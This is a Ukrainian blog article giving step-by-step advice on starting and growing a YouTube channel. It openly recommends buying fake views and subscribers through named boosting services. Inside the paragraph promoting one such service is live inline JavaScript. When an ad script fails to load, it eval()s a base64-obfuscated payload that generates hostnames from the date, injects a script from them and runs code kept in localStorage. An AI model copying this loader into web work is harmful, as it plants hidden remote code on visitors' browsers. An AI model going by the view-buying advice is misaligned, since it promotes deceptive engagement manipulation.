Як стати блогером в Ютубі: з чого почати, щоб стати популярним

YouTube – це найбільший відеохостинг у світі. Користувачі із різних країн використовують платформу не тільки для розваг, але й для заробітку. Тож якщо ви вже маєте кілька відео або навіть канал на Ютуб, ви можете стати блогером та монетизувати своє захоплення. Звісно, для цього потрібен якісний контент та знання інструментів соціальної мережі, а також бажання та наполеглива праця — все це і не тільки знадобиться Вам щоб отримати Ютуб перегляди та велику кількість підписників в цій соціальній мережі.

Читайте нижче поради, як стати блогером в Ютубі, з чого почати, та як монетизувати ваш канал.

Покроковий гайд для тих, хто хоче стати успішним ютубером

Ютуб дає величезні можливості для заробітку. Розмір прибутків тут майже необмежений. Завдяки каналу на відеохостингу, ви зможете перетворити хобі на основний заробіток. Це нелегко, але ми покроково розповімо, як стати відомим ютубером.

⭐️ Крок 1 – Визначте мету

На першому етапі потрібно відповісти на запитання – для чого вам взагалі блог, скільки підписників ви хочете отримати, скільки грошей плануєте заробляти тощо. Це дуже важливо, щоб ви чітко розуміли, для чого це робите.

⭐️ Крок 2 – Підберіть тему

Щоб заробляти в Ютуб, потрібно обрати цікаву тему, яка хвилює людей. Ви можете мати багато інтересів, але краще пошукати популярні ніші, що зможуть принести гроші. Це, наприклад, будівництво, фінанси, краса, медицина та здоров’я, подорожі та спорт.

⭐️ Крок 3 – Вивчить аудиторію

Перед тим, як знімати відео, ви маєте знати, для кого це робиться. Неможливо стати популярним ютубером, не вивчаючи свою аудиторію. Створіть для себе портрет представників вашої цільової аудиторії, так буде легше перейти до наступного кроку.

⭐️ Крок 4 – Створіть контент-план

Просування каналу на Ютуб вимагає системи. Для зручності радимо створити контент-план, в якому будуть вказані теми відео та дати розміщення нового матеріалу. Його зручно робити у вигляді таблиці.

⭐️ Крок 5 – Потурбуйтесь про SEO

Для того, щоб ваш матеріал побачило більше людей, потрібно приділити увагу SEO-оптимізації. Алгоритми мережі налаштовані таким чином, щоб показувати користувачам ті відео, які довше дивляться та на які більше натискають.

Головні метрики SEO, на які варто звернути увагу, це:

Загальний час перегляду відео.Коефіцієнт утримання, тобто середній відсоток переглядів відео. Гарним результатом вважається 50%.Коефіцієнт переходів за посиланням – це кількість людей, які натиснули на відео, побачивши його зменшену копію. Гарний результат – 10%.

Щоб стати популярним ютубером, потрібно знати, як покращити показники SEO. Для цього радять одразу переходити до суті відео та навчитися утримувати увагу глядачів протягом ролика. Також важливо писати заголовок, який точно відображає суть та зацікавить глядачів. І не забувайте про опис каналу – в ньому обов’язково мають бути ключові слова вашої теми.

⭐️ Крок 6 – Запускайте канал

Створіть канал та завантажте на нього перші матеріали. Щоб отримати перших фоловерів, попросить друзів та знайомих підписатися. Важливо заповнювати блог поступово, а не залити одразу 10 відео та забути про канал на місяць.

Як стати блогером на Ютубі: поради щодо збільшення кількості підписників і переглядів

Наявність каналу ще не означає, що ви стали блогером. Щоб монетизувати канал та почати заробляти, потрібно мати активну аудиторію та хорошу репутацію в соціальній мережі. Найважче отримати перших підписників, бо матеріал від нових каналів не дуже добре ранжується в Ютуб. Якщо ви думаете, як стати блогером в Ютубі, почніть з фоловерів та переглядів. Ми поділимось порадами, як це можна зробити.

1️⃣ Розповсюджуйте ваш контент на інших платформах

Використання спеціальних сервісів – це лише один з інструментів розвитку каналу в YouTube. Обов’язково потрібно поширювати посилання на відео в інші соціальні мережі. Особливо якщо ви маєте сторінку в Інстаграм чи Фейсбук з великою кількістю підписників.

Експерти радять використовувати ще хоча б 2 мережі, де ви зможете робити короткі анонси матеріалу, що будуть спонукати аудиторію перейти на канал.

Не бійтесь публікувати інформацію про канал в інших мережах, це підвищує охоплення. Якщо маєте знайомих, що теж цікавляться, як стати ютубером, просіть їх про взаємну рекламу.

2️⃣ Використовуйте заклик до дії

Створіть привабливий заклик до дії, який заохочує людей стати вашими фоловерами. Заклики можна тестувати та оновлювати, але не забувайте про їх використання, якщо хочете стати популярним ютубером – це інструмент для отримання безкоштовних, зацікавлених підписників. Ті, хто хочуть мати свою аудиторію, використовують кінцевий екран як інструмент, що нагадує підписатися.

До речі, заклик до дії може бути не лише закликом підписатися: також можна нагадати користувачам поставити лайк, долучитися до обговорювань в коментарях чи перейти на сайт.

3️⃣ Додаткові можливості отримати перегляди в Ютуб

На першому етапі розвитку можна скористатися спеціальними сервісами для збільшення активності на каналі, накрутки переглядів та підписників:

Сервіс — LikesID

Це популярний майданчик для швидкого просування в соціальних мережах, де можна дешево замовити накрутку переглядів на YouTube. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Сервіс — SocialBoss

SocialBoss – ще один зручний сервіс для просування каналів в Ютуб. Він підійде сторінкам, які орієнтовані на англомовну аудиторію.

Як стати відомим ютубером: обираємо популярні сфери для блогу

Ви можете створити блог в Ютуб на будь-яку тему, можете навіть розповідати, як висаджувати кактуси. Але якщо плануєте на цьому заробляти, варто обрати популярну тему. Ось ТОП-7 популярних тем, в яких можна стати успішним ютубером:

✔️ Подорожі. Travel-блогер багато подорожує, показує цікаві місця та ділиться корисними знахідками. Це завжди цікаво підписникам, але потребує витрат.✔️ Фітнес. Автор роликів має знати, як накачати м’язи, схуднути та налаштувати харчування.✔️ Краса. Бьюті-блогери розповідають, як доглядати за собою, робити макіяж та зачіску. Сфера також потребує витрат на косметику вже на старті запуску.✔️ Їжа. Фуд-блогери можуть готувати самі, куштувати незвичні блюда та ділитися враженнями, або відвідувати заклади громадського харчування та розповідати про це.✔️ Фінанси. Дуже актуальні блоги, що присвячені фінансовій грамотності, а також в яких вчать правильно заощаджувати чи більше заробляти.✔️ Будівництво. Можна показувати, як робити ремонт чи навіть будувати дачу або будинок.✔️ Мода. Фешен-блогери розповідають про тренди та навчають гарно їх поєднувати.

Це ніші, які на Ютуб вважають найбільш прибутковими.

Ще кілька корисних порад – як стати блогером на Ютубі та втримати популярність

Розвивати свій канал потрібно постійно. Ми дамо вам ще кілька порад, які допоможуть стати успішним відеоблогером та нарешті монетизувати своє хобі.

😎 Ефектне перше враження

Хочете знати, як стати блогером? Для початку навчіться викликати приємне перше враження на глядачів. Пам’ятайте, що упродовж перших 10-секунд більшість людей приймає рішення, чи потрібно дивитися відео далі. Вам потрібен гарний візуал та цікавий вступ.

🎬 Системні відео

Вам потрібно постійно створювати якісний контент та регулярно заливати відео на канал. Такі дії Ютуб сприймає як турботу про користувачів, тож важ контент буде краще ранжуватися. Окрім цього, регулярні відео – основа ваших відносин з підписниками, так вони звикають регулярно дивитися матеріали.

Ваші ролики мають бути послідовними, мати систему, щоб глядачі розуміли, чого чекати наступного разу.

📜 Сценарій та якість

Для створення контенту ідеї мало, потрібен чіткий сценарій. Перед записом ролика потренуйтесь, та прочитайте сценарій кілька разів. Не забувайте про якість, користувачі хочуть бачити чітку картинку, чути гарний звук, та бажано бути враженими спецефектами. Конкуренція в Ютуб величезна, тож важливо вміти гарно подати інформацію.

🎤 Спілкування з аудиторією

Для тих, хто цікавиться як стати блогером на Ютубі, варто пам’ятати про спілкування з аудиторією. Це необхідно для формування вашої репутації та створення атмосфери блогу. Коли користувачі заходять на сторінку і бачать, що блогер спілкується з аудиторією, в них виникає бажання підписатися та стати частиною спільноти. Реагуйте на критику, відповідайте на питання в коментарях та не забувайте дякувати глядачам в кінці відео. До речі, не треба боятися хейту, з критичних коментарів можна отримати велику користь та покращити якість блогу.

Також можна залучити нових підписників, залишаючи коментарі на каналах інших брендів чи блогерів у вашій ніші. Але не треба писати “Підпишіться на мене”, це зазвичай викликає роздратування.

Блогерство: головні плюси та мінуси

Багато людей зараз цікавляться, як стати ютубером: це дає свободу, гроші і взагалі є модною спеціальністю. Але це не так легко, як може здаватися.

Переваги блогерства, це: ✔️ Відсутність керівництва.✔️ Необмежений заробіток (він залежить лише від вас).✔️ Гнучкий графік роботи.✔️ Перспективи розвитку.✔️ Поєднання хобі та роботи.✔️ Популярність та багато шанувальників.✔️ Можливість отримати безкоштовні послуги та товари, які ви рекламуєте. Недоліки блогерства: ❌ Велика конкуренція.❌ Нестабільний заробіток.❌ Відсутність гарантій.

Блогери можуть влаштовувати собі вихідні та відпустку у будь-який момент, і це перевага. Але більшість з них працюють кожен день, щільний графік є водночас і недоліком. Бо якщо тебе немає в мережі, про тебе можуть дуже швидко забути.

Відповіді на поширені запитання про те, як стати ютубером Чи можна стати блогером в Ютуб з нуля?

Так, стати блогером може кожен, хто любить знімати відео та має чим поділитися з аудиторією. Вам будуть необхідні смартфон з хорошою камерою, вміння монтувати відео та безліч цікавих ідей для блогу. Багато людей спочатку створює блог, набирається досвіду, а вже потім проходять спеціальні курси, щоб покращити навички.

📢 Як стати блогером в Ютуб?

Як стати блогером, з чого почати – достатньо поширене запитання. Для цього потрібно створити канал та дотримуватися рекомендацій з його розвитку, які ми зібрали в статті. Після того, як ви наберете 1000 підписників, канал можна монетизувати, щоб отримувати дохід. Тобто ви можете брати товари на рекламу, або рекламувати власний бренд. Чим більше підписників, тим більше брендів захоче рекламувати свої послуги у вас.

🎤 Як стати відомим ютубером?

А це вже складніше. Щоб стати відомим блогером, потрібно відрізнятися, постійно вдосконалювати свої навички, розвиватися, слідкувати за трендами та надати аудиторії те, що вона чекає. Це можливо тільки в тому випадку, якщо ви креативна особистість, маєте багато енергії.

💰 Скільки заробляють блогери?

Дохід є індивідуальним, він залежить від розміру блогу, кількості підписників та теми каналу. Монетизувати канал на Ютуб можна лише якщо на нього підписані 1 000 людей, а відео за рік набрали від 4000 годин переглядів. За статистикою, мати дохід 100 доларів можна, якщо на каналі більше ніж 500 000 переглядів за місяць.

Зробимо висновок

На YouTube можна заробляти багато, але для цього потрібно докласти зусиль. Спочатку необхідно поставити мету, спланувати дії та продумати всі деталі ведення каналу. Перших підписників можна отримати, використовуючи сервіси накрутки, такі, як LikesID. Але обирати програми варто дуже обережно, надавайте перевагу тим, що використовують спеціальні алгоритми та надають гарантію. Це запорука безпеки вашого каналу. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/yak-stati-blogerom-v-yutubi-z-chogo-pochati-shhob-stati-populyarnim/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top